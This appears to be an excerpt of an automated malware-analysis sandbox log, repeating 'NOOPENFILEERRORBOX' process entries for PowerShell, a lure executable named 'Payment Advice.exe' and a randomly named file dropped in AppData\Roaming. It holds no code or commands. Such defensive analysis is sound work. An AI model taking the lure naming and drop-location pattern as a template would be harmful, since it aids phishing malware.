                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess information set: NOOPENFILEERRORBOX
